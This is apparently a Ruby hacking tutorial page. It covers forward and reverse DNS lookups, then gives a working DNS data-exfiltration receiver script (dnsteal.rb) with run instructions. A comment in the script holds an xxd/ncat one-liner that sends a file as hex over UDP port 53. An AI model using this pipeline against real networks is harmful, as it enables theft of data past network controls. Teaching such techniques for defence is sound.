DNS

DNS lookup

Forward DNS lookup (Host to IP)

  1. require 'resolv'
  2. Resolv.getaddresses "rubyfu.net"

Returns array of all IPs

  1. ["23.23.122.48", "107.20.161.48", "174.129.41.187"]

or use Resolv.getaddress to get one address only

Reverse DNS lookup (IP to Host)

  1. require 'resolv'
  2. Resolv.getnames "23.23.122.48"

Returns array of all hostnames, if PTR is assigned 

  1. ["ec2-174-129-41-187.compute-1.amazonaws.com"]

or use Resolv.name to get one name only

DNS Data Exfiltration

DNS out-band connection is usually allowed in local networks, which is the major benefits of using DNS to transfer data to external server.

dnsteal.rb

  1. #!/usr/bin/env ruby
  2. # KING SABRI | @KINGSABRI
  3. # for hex in $(xxd -p ethernet-cable.jpg); do echo $hex | ncat -u localhost 53 ; done
  4. # 
  5. require 'socket'
  7. if ARGV.size < 1
  8.   puts "[+] sudo ruby #{__FILE__} <FILENAME>"
  9.   exit
  10. else
  11.   file = ARGV[0]
  12. end
  14. # Open UDP Socket and bind it to port 53 on all interfaces
  15. udpsoc = UDPSocket.new
  16. udpsoc.bind('0.0.0.0', 53)
  18. begin
  20.   data     = ''
  21.   data_old = ''
  23.   loop do
  24.     response = udpsoc.recvfrom(1000)
  25.     response = response[0].force_encoding("ISO-8859-1").encode("utf-8")
  26.     data = response.match(/[^<][a-f0-9]([a-f0-9]).*[a-f0-9]([a-f0-9])/i).to_s
  28.     # Write received data to file
  29.     File.open(file, 'a') do |d|
  30.       d.write [data].pack("H*") unless data == data_old     # Don't write the same data twice(poor workaround)
  31.       puts data unless data == data_old
  32.     end
  34.     data_old = data 
  35.   end
  37. rescue Exception => e
  38.   puts e
  39. end

Run it 

  1. ruby dnsteal.rb image.jpg